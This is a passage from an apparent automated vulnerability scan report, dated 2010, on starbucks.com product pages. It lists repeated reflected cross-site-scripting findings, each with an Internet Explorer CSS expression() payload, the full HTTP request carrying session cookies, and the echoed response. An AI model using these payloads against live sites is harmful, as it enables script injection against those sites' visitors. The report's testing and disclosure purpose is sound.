The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c78ef"style="x:expression(alert(1))"30e6886810a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee?c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:57:03 GMT Connection: close Content-Length: 52822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee?c78ef"style="x:expression(alert(1))"30e6886810a=1"/> ...[SNIP]...
3.16. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c317"style="x:expression(alert(1))"4e1c91bd61f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:51:31 GMT Connection: close Content-Length: 42269
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style="x:expression(alert(1))"4e1c91bd61f=1"/> ...[SNIP]...
3.17. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f782"style%3d"x%3aexpression(alert(1))"945e17cc48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f782"style="x:expression(alert(1))"945e17cc48d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:14 GMT
Content-Length: 41929
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry?9f782"style="x:expression(alert(1))"945e17cc48d=1"/> ...[SNIP]...
3.18. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6142"style="x:expression(alert(1))"e771ce6760f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:14 GMT
Connection: close
Content-Length: 43000
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style="x:expression(alert(1))"e771ce6760f=1"/> ...[SNIP]...
3.19. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2762f"style="x:expression(alert(1))"d1da931e99d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:45 GMT
Connection: close
Content-Length: 42842
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style="x:expression(alert(1))"d1da931e99d=1"/> ...[SNIP]...
3.20. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 818c9"style="x:expression(alert(1))"3aaeb9fa4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/via?818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:49 GMT
Connection: close
Content-Length: 51777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via?818c9"style="x:expression(alert(1))"3aaeb9fa4a=1"/> ...[SNIP]...
3.21. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via/flavored-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4285"style%3d"x%3aexpression(alert(1))"cebb7d2a308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4285"style="x:expression(alert(1))"cebb7d2a308 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:37 GMT
Content-Length: 53694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via/flavored-coffee?d4285"style="x:expression(alert(1))"cebb7d2a308=1"/> ...[SNIP]...
3.22. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via/instant-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7511a"style="x:expression(alert(1))"c08da2b8d6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/via/instant-coffee?7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:24 GMT
Connection: close
Content-Length: 53628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via/instant-coffee?7511a"style="x:expression(alert(1))"c08da2b8d6b=1"/> ...[SNIP]...
3.23. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32506"style%3d"x%3aexpression(alert(1))"0b3e0429598 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32506"style="x:expression(alert(1))"0b3e0429598 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee?32506"style%3d"x%3aexpression(alert(1))"0b3e0429598=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:51:46 GMT
Connection: close
Content-Length: 54456
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee?32506"style="x:expression(alert(1))"0b3e0429598=1"/> ...[SNIP]...
3.24. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/africa-arabia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36fd8"style="x:expression(alert(1))"eee799f60ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/africa-arabia?36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:18 GMT
Connection: close
Content-Length: 41207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?36fd8"style="x:expression(alert(1))"eee799f60ab=1"/> ...[SNIP]...
3.25. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/asia-pacific
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d4f5"style="x:expression(alert(1))"07322c9d36a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/asia-pacific?5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:23 GMT
Connection: close
Content-Length: 40730
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?5d4f5"style="x:expression(alert(1))"07322c9d36a=1"/> ...[SNIP]...
3.26. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc378"style="x:expression(alert(1))"dc2a561ad6f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:32:57 GMT
Connection: close
Content-Length: 42564
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style="x:expression(alert(1))"dc2a561ad6f=1"/> ...[SNIP]...
3.27. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/latin-america
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ed27"style="x:expression(alert(1))"54fc7b2d713 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/latin-america?9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:15 GMT
Connection: close
Content-Length: 44497
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?9ed27"style="x:expression(alert(1))"54fc7b2d713=1"/> ...[SNIP]...
3.28. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/multi-region-blends
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f92e"style="x:expression(alert(1))"69974f7cbb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/multi-region-blends?2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:29 GMT
Connection: close
Content-Length: 44773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?2f92e"style="x:expression(alert(1))"69974f7cbb4=1"/> ...[SNIP]...
3.29. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68bf7"style="x:expression(alert(1))"0236f70923d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:22 GMT
Connection: close
Content-Length: 41054
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style="x:expression(alert(1))"0236f70923d=1"/> ...[SNIP]...
3.30. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e95fa"style%3d"x%3aexpression(alert(1))"75289b27baf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e95fa"style="x:expression(alert(1))"75289b27baf in the application's response.
